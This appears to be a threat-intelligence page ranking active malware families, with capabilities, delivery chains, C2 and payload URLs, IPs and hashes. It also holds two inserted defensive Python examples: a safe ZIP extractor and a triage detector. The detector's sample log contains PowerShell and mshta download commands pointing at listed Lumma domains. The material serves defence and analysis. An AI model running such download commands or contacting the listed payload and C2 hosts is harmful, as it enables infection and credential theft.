Trending Malware
Active families, ranked. Mallory tracks every named malware family across vendor reports, researcher analysis, and threat feeds, then surfaces the ones gaining velocity right now.
Ranked by Mallory's mention-velocity model across sources.
Top 24 malware · Last week
StealC is a malware-as-a-service infostealer active since January 2023 and widely described as an infostealer-as-a-service or information-stealing malware with optional dropper/loader functionality. It is designed to extract passwords, stored access data, digital identities, authentication cookies, session tokens, autofill data, credit card details, cryptocurrency wallet data, browser extensions, and files matching operator- or affiliate-defined patterns from compromised Windows systems. Reported targets include Chromium-based and Gecko-based browsers, desktop applications, mail and messaging clients such as Outlook, Thunderbird, Telegram and Discord, file transfer and VPN tools such as FileZilla, WinSCP, OpenVPN and ProtonVPN, gaming applications such as Steam, and crypto wallets. StealC also collects broad system information from infected hosts and can download and execute follow-on payloads, making it useful both for credential theft and as an initial-access enabler in larger attack chains. The malware is sold to affiliates through a self-hosted control-panel model and has been advertised on criminal forums by the actor using the moniker "plymouth." Content indicates StealC received a major version 2 architectural update in March 2025 and had reached versions around 2.22.x by mid-2026. Researchers describe StealC v2 as using JSON over HTTP with RC4-encrypted communications and per-build or per-victim configuration. Affiliates operate their own infrastructure rather than relying on a single centralized backend. StealC is frequently used alongside Amadey, which commonly provides initial access or delivers StealC as a second-stage payload. Observed delivery vectors in the provided content include phishing, software downloads from untrusted sources, fake software updates, cracked software installers, third-party malware loaders, SEO abuse, malvertising, GitHub and GitLab-hosted payloads, and traffic-team distribution through social media and forums. 
One documented December 2025 campaign used Amadey to download StealC from https://gitlab[.]bzctoons.net/suau/fds/-/raw/main/protected.zip, extract x64_protect.exe, and connect to a StealC C2 at http://158.94.208.130/8528aa6d5ece46dc.php. Reported sample hashes from that campaign include StealC payload SHA256 b5d4cc84845cb101f8bda324729ebedd8acd36cc8ec32f80969c4fb6d3c2b8a7. StealC has also been observed delivering or facilitating additional malware, including Amadey, AsyncRAT, RedLine Stealer, Vidar, XTinyLoader, XMRig, HijackLoader, SectopRAT, SmokeLoader, zgRAT, and in at least one case LockBit Black ransomware via XTinyLoader. This supports its role in broader cybercrime workflows involving credential theft, resale of logs, fraud, and follow-on ransomware deployment. The malware has been the subject of major international disruption activity under Operation Endgame in June 2026. Europol, Microsoft, Proofpoint, IBM X-Force, ESET, BitSight, Shadowserver, and multiple law-enforcement agencies targeted StealC infrastructure, with reporting tying the broader action to 326 servers, 142 domains, roughly 27 million stolen credentials, and more than EUR 41 million in criminal crypto assets. Microsoft reported that infrastructure tied to Amadey and StealC reached more than 140,000 infected machines globally in early May, and that more than 200 command-and-control servers were disrupted. Proofpoint and IBM X-Force reported discovering and exploiting a directory traversal vulnerability in the PHP-based StealC C2 panel, caused by improper sanitization of filenames containing forward slashes during ZIP extraction, which allowed web-shell upload to StealC servers; the developers patched this flaw in February 2026. High-confidence indicators and observables directly mentioned in the content include the GitLab payload URL above; StealC C2 http://158.94.208.130/8528aa6d5ece46dc.php; and references to StealC V2 / v2.22.x. 
The malware is consistently characterized in the content as a pervasive infostealer in the cybercrime ecosystem, used for theft of credentials and sensitive data for later illicit use including account compromise, data trading, fraud, and enabling downstream intrusions.
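The panel flaw described above, improper handling of ZIP member names during extraction, is a general bug class in any service that unpacks uploaded archives. The following is an added example of the defensive check such a handler needs; it is not code from the page, from the panel, or from any of the vendors named above. The two archives it builds are constructed in memory, the `allow_subdirs` switch and the helper names are this example's own, and the policy shown (validate every name before the first write, then re-check containment with realpath on each write) is the standard mitigation rather than anything the page attributes to the patched panel.

```python
"""Defensive ZIP extraction: validate every member name before writing anything.

Added example; not code from the page or from any C2 panel it describes. It shows
the check an upload handler that unpacks ZIP files needs, parameterised so that a
handler expecting flat files can reject any path separator at all.
"""
import io
import os
import posixpath
import tempfile
import zipfile
from typing import Optional


def unsafe_reason(name: str, allow_subdirs: bool = False) -> Optional[str]:
    """Return None if the member name is acceptable, otherwise why it is not."""
    if not name:
        return "empty name"
    if "\\" in name:
        return "backslash separator"
    if name.startswith("/"):
        return "absolute path"
    head = name.split("/", 1)[0]
    if len(head) >= 2 and head[1] == ":":
        return "drive letter"
    if ".." in posixpath.normpath(name).split("/"):
        return "parent-directory traversal"
    if not allow_subdirs and "/" in name:
        return "subdirectory not allowed"
    return None


def extract_safely(zip_bytes: bytes, dest: str, allow_subdirs: bool = False) -> list:
    """Extract an in-memory ZIP into dest, refusing the whole archive on any unsafe name.

    All names are validated before the first write, and a realpath containment
    check guards each write so symlinks or odd normalisation cannot slip through.
    """
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reason = unsafe_reason(info.filename, allow_subdirs)
            if reason:
                raise ValueError(f"rejected {info.filename!r}: {reason}")
        for info in zf.infolist():
            if info.is_dir():
                continue  # directories are created on demand when a file inside them is written
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"rejected {info.filename!r}: escapes destination")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, dest_real))
    return written


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: content}; used only for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def run_constructed_samples() -> dict:
    """Exercise the checks on two constructed archives and return a summary."""
    clean = build_zip({"good.txt": b"hello", "data/log.txt": b"x"})
    slip = build_zip({"ok.txt": b"a", "../evil.php": b"<?php"})  # constructed traversal entry
    out = {}
    with tempfile.TemporaryDirectory() as d:
        out["clean_written"] = sorted(extract_safely(clean, d, allow_subdirs=True))
        try:
            extract_safely(slip, d, allow_subdirs=True)
            out["slip_rejected"] = False
        except ValueError as err:
            out["slip_rejected"] = True
            out["slip_reason"] = str(err)
        # The archive is validated before any write, so ok.txt never lands on disk.
        out["nothing_written_from_slip"] = not os.path.exists(os.path.join(d, "ok.txt"))
    return out


if __name__ == "__main__":
    print(run_constructed_samples())
```

The default `allow_subdirs=False` is the right setting for an upload endpoint that expects a flat bundle of files: rejecting every slash removes the whole traversal question rather than trying to sanitise it. Note that the archive is refused as a unit; partially extracting a hostile archive leaves a half-written state that is harder to reason about than a clean rejection.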
Amadey is a modular malware-as-a-service loader/botnet active since 2018 and sold on Russian-language or darknet forums. It is primarily used as a dropper/loader to provide initial access to compromised Windows systems and deliver second-stage payloads, including infostealers and ransomware-related malware. Multiple sources in the content describe Amadey as frequently used alongside StealC, with Amadey enabling access and payload delivery while StealC steals credentials and other sensitive data. The malware is mainly disseminated through phishing campaigns, though reporting in the content also notes delivery via fake software updates, cracked software installers, third-party malware loaders, GitHub in earlier activity, and an exploited self-hosted GitLab instance in a documented 2025 campaign. In that campaign, Amadey downloaded additional components including a clipper plugin and the StealC infostealer from gitlab.bzctoons.net. Amadey is described as modular and capable of more than simple payload delivery. Reported capabilities include downloading and executing follow-on malware, information stealing, credential theft, clipboard monitoring or clipper functionality, screenshot capture, data exfiltration, and remote-access/RAT-like features including VNC-based access. One source states the main bot effectively works as a RAT, with dynamically tasked payload distribution from C2. ESET reporting in the content notes modules for clipboard monitoring, credential theft, and VNC-based remote access. Europol-linked reporting also states Amadey can retrieve sensitive data from infected systems. Technical details directly mentioned in the content include HTTP-based C2 communications, RC4-encrypted communications or data exchange, hardcoded C2 URLs, embedded build identifiers, and anti-sandbox behavior requiring a live C2 response before registration and persistence complete. 
In the Trellix-described December 2025 campaign, Amadey used a mutex named f936986d553273aef6eeaeef713ad28f, stored an RC4/decryption key 828065b4fbbccc7d69743a0648c2f656 and bot ID 07072f in plaintext, beaconed to 91.92.243.129/0gjSy4hf3/index.php, requested plugin clip64.dll, downloaded StealC from https://gitlab.bzctoons.net/suau/fds/-/raw/main/protected.zip, and established persistence via the scheduled task file C:\Windows\Tasks\Yfgfwb.job. Reported hashes from that campaign were d7a366fa4d31c901ce3bcb6760d7bb5aa7cab49bb54d8c6551b3df14c8cf64e7 for the Amadey loader Yfgfwb.exe, bae0f38f58ad93728261f09840721ebedb9669a445f40083396fdd0da38a22a7 for clip64.dll, and b5d4cc84845cb101f8bda324729ebedd8acd36cc8ec32f80969c4fb6d3c2b8a7 for the StealC payload x64_protect.exe. The content links Amadey to broad criminal use in larger attack chains and ransomware enablement. It is characterized as an early-stage access and delivery component in the cybercrime supply chain and as infrastructure disrupted during Operation Endgame in June 2026. Microsoft, Europol, and partners reported that Amadey and StealC shared infrastructure despite being developed by separate actors, and Microsoft also cited observed use of Amadey by the Russian-affiliated actor Secret Blizzard to deploy custom malware against targets in Ukraine. Targeting is broad and global rather than sector-specific in the provided content, with infections and victim systems discussed worldwide.
SocGholish, also known as FakeUpdates, is a malware dropper/loader and initial-access service distributed via fake browser or software update prompts served from compromised websites, especially compromised WordPress sites. The malware is used to gain unauthorized access to victim systems and deliver next-stage malware, supporting downstream ransomware, data theft, financial fraud, and attacks on critical infrastructure. Multiple sources in the content describe large-scale remediation of SocGholish-infected WordPress sites, including nearly 15,000 compromised websites, and note that the malware was offered as cybercrime-as-a-service. The content links SocGholish to the Russian cybercriminal group Evil Corp and states it has been associated with ransomware and money-laundering operations. Reported infrastructure actions tied to Operation Endgame included disruption of SocGholish infrastructure, seizure of domains and servers, and victim notification efforts. High-confidence infection behavior in the content includes fake browser-update scams on compromised websites and use of compromised WordPress sites as the primary delivery vector.
Vidar is a Windows infostealer malware family, also referred to as Vidar Stealer and in some reporting as Vidar v2. It is described as an actively developed malware-as-a-service infostealer and was among the more prevalent infostealer services observed in 2025. Its core capability is theft of sensitive data including login credentials, browser history, cookies, autofill data, saved payment information, cryptocurrency wallet data, messaging application files, screenshots, and other host information. Reporting also places Vidar within the broader cybercriminal access-brokering ecosystem, where stolen logs and credentials are used or resold to support follow-on intrusion activity. High-confidence reporting in the provided content shows Vidar targeting browser-stored data from Chromium-based and Gecko-based browsers, and newer Vidar development introduced a technique to bypass Chromium Application-Bound Encryption (ABE). That technique scans browser memory for the encrypted v20_master_key, invokes CryptUnprotectMemory inside the browser process via APC injection, verifies the recovered key by attempting AES-256-GCM decryption of ABE-protected data, and then re-encrypts the key in memory. One cited Vidar 2.1 sample is associated with hash 459daa809751e73f60fbbe4384a7d1653c36bb06945e4eb3635270924241100a. Separate reporting states Vidar v2 was delivered entirely in memory by a Go-based launcher and exfiltrated stolen data through an encrypted proxy tunnel. Observed infection and delivery vectors in the content include distribution through other malware and traffic-distribution ecosystems. Vidar was seen delivered by StealC affiliates, by Amadey botnet clusters, through ClickFix campaigns, through compromised WordPress sites using the ErrTraffic framework, through Steam Wallpaper Engine abuse, and in a Ukraine-focused GhostShell campaign using a malicious archive named Besomar_documentation.rar. 
In the GhostShell case, the launcher 22.exe delivered Vidar v2 in memory; associated infrastructure included cloudaxis[.]cc, cdnexpress[.]cc, 154.58.204[.]149, 5.252.177[.]88, 5.181.156[.]168:25475, and 86.54.25[.]2. In ErrTraffic activity, the Analytics cluster used Polygon wallet address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to resolve C2 domains and fetch Vidar payloads during April and May 2026. The malware is associated in the content with multiple criminal ecosystems rather than a single actor. It is referenced alongside operations involving StealC, Amadey, Scattered Spider, and MaaS distribution clusters such as ErrTraffic. Scattered Spider advisories list VIDAR Stealer among malware used by that group. Vidar also appeared in infrastructure and payload observations tied to BraZZZerS Fast Flux, StealC-linked delivery chains, Amadey clusters, and gamer-targeting Steam wallpaper campaigns. Targeting reflected in the content includes general credential theft at scale, enterprise access enablement, cryptocurrency theft, gamers, and in at least one campaign, Ukraine’s drone and defense supply chain ecosystem. Known indicators and artifacts directly mentioned in the content include the Vidar 2.1 hash 459daa809751e73f60fbbe4384a7d1653c36bb06945e4eb3635270924241100a; GhostShell-related files 22.exe, 122.exe, update.exe, and MicrosoftUpdate-1.302.1609.vbs; the lure archive Besomar_documentation.rar; domains cloudaxis[.]cc and cdnexpress[.]cc; Telegram resolver t[.]me/flufff6262; beacon path https://cdnexpress[.]cc/analytics; and the ErrTraffic Analytics wallet address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308.
Cobalt Strike is a commercial penetration-testing and red-team framework that is frequently abused by threat actors as post-exploitation malware, most notably through its Beacon payload for command-and-control, remote access, lateral movement, and in-memory execution. The content directly associates it with deployment by multiple intrusion sets and malware delivery chains, including APT29/Nobelium in 2021 campaigns against European governments, TA577 phishing campaigns, Hancitor, SquirrelWaffle, SharkLoader in Kaspersky’s StrikeShark campaign, and follow-on activity in the SolarWinds compromise and the 2025 Notepad++ supply-chain attack. Reported targets and victim sectors linked to Cobalt Strike use in the provided content include European governments, diplomatic and government organizations, software development companies, telecommunications, financial organizations, and other selectively targeted entities across countries including Indonesia, Taiwan, Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Nepal, Serbia, Vietnam, El Salvador, Australia, and the Philippines. Observed delivery and infection vectors in the content include HTML smuggling attachments, phishing documents, malicious HTML files, exploitation of internet-facing vulnerabilities, trojanized software installers, malware loaders, and compromised software update infrastructure. Specific loaders and droppers mentioned as delivering Cobalt Strike include SharkLoader, Hancitor, SquirrelWaffle, and trojanized installers in the Notepad++ campaign. In the StrikeShark reporting, SharkLoader used DLL side-loading and Perfect DLL Hijacking, decrypted and loaded components including DscCoreR.mui and SyncRes.dat, installed API hooks with Microsoft Detours and MinHook, hooked VirtualAlloc and Sleep, and resumed a suspended thread to execute Cobalt Strike Beacon while attempting to evade memory scanning. 
The content describes Cobalt Strike as being used to maintain remote access, move through victim networks, support reconnaissance and credential theft, and load .NET assemblies in memory via execute-assembly. It is also referenced as common red-team C2 tooling alongside Sliver and Mythic, and as a framework often used before ransomware deployment, including in Hancitor-related intrusions and as an initial delivery path for LockBit 3.0. Detection-relevant details directly mentioned in the content include the command line pattern "conhost.exe 0xffffffff -ForceV1" observed during some Cobalt Strike payload execution, remote service installation and Beacon deployment telemetry, named pipe activity, PowerShell injection, and infrastructure characteristics such as APT29/Nobelium Cobalt Strike C2 setups using custom certificates, redirectors, and mod_rewrite-based redirection. Additional infrastructure references include a repurposed Cobalt Strike C2 at 194.165.16[.]80 and broad discussion of hunting Cobalt Strike C2 infrastructure via internet-exposed services.
Lumma Stealer, also referred to as Lumma and LummaC2, is a commercial malware-as-a-service infostealer that has been openly traded on Russian-speaking cybercrime forums since 2022. It is tracked by Microsoft as Storm-2477 and was described as one of the most prevalent infostealer services in 2025 until an international law-enforcement and industry disruption in May 2025. The malware is used by affiliates rather than a single threat actor group, with operators using a centralized web panel to generate builds and retrieve stolen logs. Its core capability is theft of browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, browser extensions, MFA-related data, and financial credentials. The content also states that Lumma logs have been widely sold on illicit forums, and that ransomware syndicates and other criminal actors have used Lumma to obtain initial access into corporate networks. Lumma has also been referenced as both a credential theft tool and a dropper for additional malware in Black Basta activity. Observed delivery vectors include phishing emails disguised as hotel bookings or invoices, fake CAPTCHA and ClickFix social-engineering chains, malvertising, poisoned search ads for common software, cracked or pirated software, GitHub and cracked-software forum lures, and distribution by other malware loaders such as Amadey. Multiple campaigns described in the content relied on tricking users into opening the Windows Run dialog and executing clipboard-pasted PowerShell or mshta commands, which then downloaded and launched Lumma in the background. One campaign used compromised websites and EtherHiding infrastructure with payload components stored on Binance Smart Chain; another targeted visitors of Arabic pirated movie sites and used a legitimate Adobe-signed executable vulnerable to DLL sideloading, where a malicious sqlite.dll was identified as Lumma Stealer. 
The malware has been associated in reporting with widespread criminal use and downstream ecosystem activity. Microsoft tracks Lumma’s core developer as Storm-2477. The content also states that Black Basta used LummaC2, that Amadey clusters frequently delivered Lumma payloads, and that Lumma was among leading observed infections in Mexico in 2025. INTERPOL reporting cited in the content also listed Lumma among top banking trojan and infostealer families in Asia and the South Pacific. High-confidence indicators and technical details mentioned in the content include use of fake CAPTCHA chains with Win+R/Ctrl+V execution, PowerShell and mshta download cradles, Prometheus TDS redirection to binadata[.]com in a Canada-targeted campaign, retrieval of a JavaScript stage from 185.147.125[.]174, EtherHiding infrastructure referencing data-seed-prebsc-1-s1.bnbchain[.]org and check.foquh[.]icu, and a hard-coded anti-analysis failsafe that hashes the local username and computer name and exits if the values match 0x56CF7626 or 0xB09406C7. Additional campaign-specific IOCs tied to Lumma delivery in the content include accentypastedw[.]store, onefreex[.]com, rentry[.]co, 188.114.97[.]3, 104.26.3[.]16, 172.67.194[.]91, filehere0987[.]b-cdn[.]net, and SHA-1 bfc1422d1c5351561087bd3e6d82ffbad5221dae for a malicious sqlite.dll identified as Lumma Stealer.
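Two of the detection details given on this page lend themselves to a process-creation triage rule: the Cobalt Strike entry's "conhost.exe 0xffffffff -ForceV1" command line, and the Lumma entry's Win+R/Ctrl+V chains that launch mshta or PowerShell with a download cradle. The following is an added example that scores both patterns over constructed log lines; it is not code from the page or from any vendor's telemetry. The log format, hostnames and usernames are made up; the only page-derived values are the Lumma delivery domains used as a watchlist (with the defanging brackets removed) and the conhost string itself. One caveat the example encodes: conhost with those exact arguments is spawned for any ordinary console application, so it is scored only when the process that created the console is not an interactive shell, and even then as a weak signal to correlate with the parent's activity.

```python
"""Triage of process-creation events for two patterns described above.

Added example; not code from the page or from any vendor. The log format and all
sample lines are constructed for this demonstration. The domains in the first two
lines are the Lumma-delivery IOCs listed above; everything else is made up.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts host user parent image cmd")

SAMPLE_LOG = """\
2026-06-02T09:14:03Z host=WS01 user=alice parent=explorer.exe image=powershell.exe cmd="powershell.exe -w hidden -c iwr http://accentypastedw.store/p"
2026-06-02T09:14:04Z host=WS01 user=alice parent=explorer.exe image=mshta.exe cmd="mshta https://onefreex.com/a.hta"
2026-06-02T09:20:11Z host=WS02 user=bob parent=rundll32.exe image=conhost.exe cmd="conhost.exe 0xffffffff -ForceV1"
2026-06-02T09:21:00Z host=WS03 user=carol parent=cmd.exe image=conhost.exe cmd="conhost.exe 0xffffffff -ForceV1"
2026-06-02T09:22:30Z host=WS04 user=dave parent=outlook.exe image=excel.exe cmd="excel.exe /x report.xlsx"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)

# Delivery domains listed above for Lumma (defanging brackets removed for matching).
LUMMA_DELIVERY_DOMAINS = {"accentypastedw.store", "onefreex.com", "rentry.co", "filehere0987.b-cdn.net"}
CLICKFIX_HOSTS = {"mshta.exe", "powershell.exe"}
# Parents under which conhost.exe with these arguments is routine.
CONSOLE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
CS_CONHOST_CMD = "conhost.exe 0xffffffff -forcev1"


def parse(text):
    """Parse the constructed log format into Event tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(**m.groupdict()))
    return events


def assess(ev):
    """Return (score, reasons) for one event; 0 means no pattern matched."""
    score, reasons = 0, []
    image, parent = ev.image.lower(), ev.parent.lower()
    # ClickFix / fake-CAPTCHA chains: the pasted Win+R command runs as a child of explorer.exe,
    # so a script host spawned by explorer with a URL on its command line is the first signal.
    if image in CLICKFIX_HOSTS and parent == "explorer.exe":
        hosts = {h.lower() for h in URL_RE.findall(ev.cmd)}
        if hosts:
            score += 3
            reasons.append(f"{image} launched from explorer.exe with a URL on the command line")
            if hosts & LUMMA_DELIVERY_DOMAINS:
                score += 5
                reasons.append("command line references a listed Lumma delivery domain")
    # The conhost pattern is normal for any console application, so it only scores when the
    # process that created the console is not an interactive shell.
    if image == "conhost.exe" and ev.cmd.strip().lower() == CS_CONHOST_CMD and parent not in CONSOLE_PARENTS:
        score += 2
        reasons.append(f"conhost -ForceV1 pattern under non-shell parent {parent}; correlate with parent activity")
    return score, reasons


def triage(text, threshold=2):
    """Return (host, image, score, reasons) for every event at or above threshold."""
    hits = []
    for ev in parse(text):
        score, reasons = assess(ev)
        if score >= threshold:
            hits.append((ev.host, ev.image, score, reasons))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

The explorer.exe parent is what distinguishes a Run-dialog launch from an administrator's script or a scheduled task, which is why the rule keys on it before looking at the URL; the domain watchlist only raises the score of an event that already matched on behaviour, so it keeps working after the listed domains rotate.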
ModeloRAT is a Python-based remote access trojan/backdoor associated with the financially motivated initial access broker Woodgnat, also known as KongTuke. Reporting links its use to access-broker activity supporting ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, and Symantec separately observed ModeloRAT in attacks that deployed Qilin ransomware. The malware has been delivered into corporate environments through social-engineering campaigns, including ClickFix/CrashFix-style lures on compromised WordPress infrastructure and, from at least April 2026, Microsoft Teams messages impersonating IT or help-desk staff that trick victims into running malicious PowerShell commands. Huntress first reported on ModeloRAT in January 2026 during investigation of the CrashFix campaign. Observed delivery chains include malicious PowerShell that downloads a portable WinPython environment and launches ModeloRAT via a signed or bundled pythonw.exe interpreter. In Teams-based intrusions, reported artifacts included scriptA.vbs, StartManagerB.lnk, Pmanager.py, and the portable Python runtime WPy64-31401, with persistence established through Startup shortcuts, VBScript launchers, Run keys, and scheduled tasks. Reporting also states that newer variants use multiple independent command-and-control paths, automatic failover across a server pool, randomized URL paths, self-update capability, and multiple access channels including a primary RAT, reverse shell, and TCP backdoor. High-confidence capabilities directly described in the source material include collection of system and user information, screenshot capture, file exfiltration, and resilient persistence inside enterprise networks. Related reporting states that ModeloRAT commonly targets domain-joined or corporate systems and has been used in attacks against organizations in sectors including education, insurance, IT, and professional services. 
Additional infrastructure and behavior linked in the content include RC4-encrypted command-and-control communications, multiple independent C2 paths, and delivery through KongTuke traffic-distribution infrastructure built on compromised WordPress sites and fake CAPTCHA/ClickFix lures.
RedLine Stealer is a customizable information-stealing trojan and infostealer, written in .NET/C#, first identified in 2020. It is detected by ESET as MSIL/Spy.RedLine and MSIL/Spy.Agent. The malware is designed to collect passwords, cookies, credit card data, location and other system information, and browser data. Reported targeting includes credentials and data from browsers such as Google Chrome and Mozilla Firefox, as well as applications and services including Discord, FileZilla, Steam, Telegram, and VPN clients such as OpenVPN and ProtonVPN. The malware can also search for files, upload them to a remote server, download additional files, and execute them, and reporting notes it can be used to deliver additional malware including ransomware, RATs, trojans, miners, and other payloads. RedLine appears repeatedly in commodity cybercrime and infostealer ecosystems. It has been observed as a payload delivered by other malware and loader operations including StealC-linked activity, Amadey, and multi-stage cracked-software infection chains. It is also referenced in broader credential-theft and traffic-team ecosystems, where stolen logs are monetized through criminal markets and Telegram channels. Reporting cited in the content states that LAPSUS$ acquired and used the RedLine password stealer in its operations. Observed delivery vectors in the content include phishing campaigns, fraudulent websites, malicious applications, cracked or pirated software lures, SEO abuse, and Discord messages from compromised accounts carrying password-protected ZIP archives. One analyzed infection chain showed RedLine abusing AppLaunch.exe from the .NET Framework directory and using configuration pointing to net.tcp://45.15.156.187:23929/, with the botnet identified as "LogsDiller Cloud (Telegram: @logsdillabot)." Another mention lists a RedLine C2 as hrabrlonian[.]xyz:81 / 45.130.151[.]133. 
Law-enforcement reporting in the content states that in October 2024 international authorities announced the takedown of the RedLine and META infostealers after seizing domains, servers, and Telegram accounts used by their administrators, and other reporting notes that RedLine variants disappeared due to coordinated law-enforcement action. The content also references Operation Endgame datasets derived primarily from RedLine and Meta stealer logs seized during enforcement actions.
Gh0st RAT is a long-lived remote access trojan (RAT) whose source code was released publicly in 2008, leading to widespread reuse, modification, and actor-specific forks by both cybercriminal and APT operators. It is also referenced by aliases including Gh0st, Gh0stRAT, Moudoor, and Mydoor. The malware first gained major attention in 2009 in GhostNet espionage activity targeting diplomatic, political, economic, and military entities worldwide. Based on the provided content, Gh0st RAT is a Windows-focused RAT family with broad remote administration capability, and variants or derivatives have also appeared on Linux. Reported capabilities and behaviors include command execution, file download and file operations, keylogging, clipboard theft or hijacking, screen capture, system information gathering, active-window logging, process injection, and persistence. Persistence mechanisms explicitly mentioned include creating a new Windows service and using Task Scheduler COM interfaces to create scheduled tasks. Linux Gh0st RAT variants detected as Linux/Rekoobe-A were described as inspecting crafted ICMP traffic and using it to trigger either a reverse shell or a listener on port 31234. The malware is frequently used as a base for customized implants. The content explicitly notes modified or related families including GodRAT, which is based on the Gh0st RAT codebase; Dragon Breath/APT-Q-27 payloads described as modified open-source Gh0st RAT; GALLIUM’s customized Gh0st RAT variant QuarkBandit; and multiple actor-specific forks observed by researchers. One report states that a Dragon Breath debug-build sample contained Gh0st RAT source code. Another notes that Webworm developed customized versions of Gh0st RAT alongside Trochilus and 9002 RAT. 
Threat actor and campaign associations directly mentioned in the content include GhostNet; GALLIUM targeting telecommunications providers in Southeast Asia, Europe, and Africa; Dragon Breath/APT-Q-27 targeting primarily Chinese-speaking users and online-gambling-related victims; Webworm/Space Pirates targeting government and enterprise sectors including IT services, aerospace, and electric power in Russia, Georgia, Mongolia, and other Asian countries; and infrastructure overlap with ValleyRAT activity in June 2026 WhatsApp-delivered VBScript campaigns that ultimately installed ManageEngine Endpoint Central. The content repeatedly notes that such overlap is insufficient on its own for confident attribution in those WhatsApp campaigns. Targeting described in the content spans diplomatic, political, economic, and military organizations; telecommunications providers; government agencies; IT services, aerospace, and electric power sectors; Chinese-speaking users seeking unofficial Telegram and WhatsApp downloads; online-gambling-related victims; and financial trading and brokerage firms in campaigns involving the Gh0st-derived GodRAT. Infection and delivery methods mentioned include DLL sideloading, trojanized installers, malicious .scr and .pif files disguised as financial documents and distributed via Skype, fake Telegram and WhatsApp download sites, and use as second-stage payloads after web-shell or exploit activity. The content also describes COM-based persistence and service creation behavior in some variants. 
High-confidence indicators and protocol details directly mentioned include infrastructure overlap on IP 202.61.160[.]201 previously associated with ValleyRAT and Gh0st RAT activity; Gh0stKCP, a UDP-based protocol used by ValleyRAT and identified in traffic linked to overlapping infrastructure at 143.92.37.168:10086; Dragon Breath stage-4 C2 domain qaqkongtiao[.]com; Dragon Breath mutex Global\DHGGlobalMutex; and a Windows RAT variant observed by ESET that changed the Gh0st RAT packet flag to the string "lambo."
Miasma is a self-propagating software supply-chain worm and credential-stealing attack framework, also tracked as “The Spring Blight,” and described as an evolution or variant of the earlier Shai-Hulud / Mini Shai-Hulud malware lineage. Reporting links it to a broader cluster that also includes Hades, and some sources associate the lineage with TeamPCP, although direct attribution of all Miasma activity remains unclear. The malware has targeted developer ecosystems, CI/CD pipelines, GitHub repositories, and package registries including npm, PyPI, RubyGems, and JFrog Artifactory. Public reporting also links it to compromises affecting Red Hat npm packages, Microsoft GitHub repositories, the LeoPlatform and RStreams npm ecosystems, and a Go module tied to the Verana Blockchain project. Miasma infects developer workstations and CI runners, steals a broad set of credentials and secrets, and uses those credentials to propagate by modifying legitimate repositories and publishing trojanized package versions. Reported targets include GitHub personal access tokens, GitHub Actions secrets and OIDC tokens, npm and PyPI tokens, AWS, Azure, and Google Cloud credentials, Kubernetes service account tokens and configs, HashiCorp Vault credentials, SSH private keys, Docker auth files, JFrog Artifactory credentials, 1Password data, GPG material, .env files, CI secrets, and AI coding tool configurations for tools such as Claude, Cursor, Gemini, Copilot, Kiro, and Cline. Multiple reports state that it also scrapes GitHub Actions runner memory on Linux to extract secrets not exposed as environment variables. Propagation and execution tradecraft varies by wave. Earlier variants used npm lifecycle hooks, while later variants used binding.gyp / node-gyp execution during npm install to avoid visible install or postinstall scripts. 
Several reports describe a Bun-based multi-stage payload: malicious packages replaced normal code with a heavily obfuscated JavaScript loader, downloaded and executed the Bun runtime, wrote the worm payload to a temporary path, executed it with bun run, and deleted the temporary file. The malware has also been observed pushing weaponized GitHub Actions workflows, abusing GitHub OIDC trusted publishing to release malicious npm packages with valid SLSA provenance attestations, poisoning repositories through orphan commits and branch mutations, and targeting source-repository execution paths in IDE or AI coding assistant environments rather than relying only on package-manager hooks. Miasma commonly exfiltrates stolen data through GitHub rather than traditional dedicated C2 infrastructure. Reports state that it creates public repositories using victim accounts, uploads encrypted JSON results, and uses recognizable campaign markers such as the repository description “Alright Lets See If This Works.” Additional strings linked to the malware family include “RevokeAndItGoesKaboom,” “TheBeautifulSandsOfTime,” “thebeautifulmarchoftime,” and “firedalazer.” Some reporting states that Miasma polls GitHub commit search or public commits for commands, configuration, payload locations, or attacker-controlled tokens. Public reporting also describes a destructive dead-man-switch behavior in some variants: when a stolen GitHub token used for exfiltration is revoked, the malware may trigger deletion of files in the victim’s home and Documents directories, using a systemd service on Linux or a LaunchAgent on macOS, with activity persisting for up to 72 hours. Observed evasion and anti-analysis features include heavy obfuscation, layered encryption such as ROT-style encoding and AES-GCM, polymorphic or per-build payload variation, checks for security tools including CrowdStrike and SentinelOne, and a Russian locale guard or killswitch. 
Reported malicious artifacts and indicators include binding.gyp, .github/setup.js, _index.js, .claude/setup.mjs, .claude/settings.json, .cursor/rules/setup.mdc, .gemini/settings.json, and .vscode/tasks.json. Reported hashes directly associated with Miasma-related reporting include SHA-256 ceff7c51d70832c3ec8dd2744b606a23b3c924ef664ae23439b9b742ea154108, 9f93d77d32833a515bc406c46da477142bb1ac2babeecb6aa42f98669a6db015, 6331d1511783dcb1158fb54775f563e90399b3a2a81a584d3cba9a77f63d15a7, 58215f1d737443fd782f91c57ec10ad58109a96470054707fc6bfd6358abe468, and 3f3f42d072bd36860ab7bd7fb5e10ac0d22c741c13c89505ccd6ec0ea572eea7.
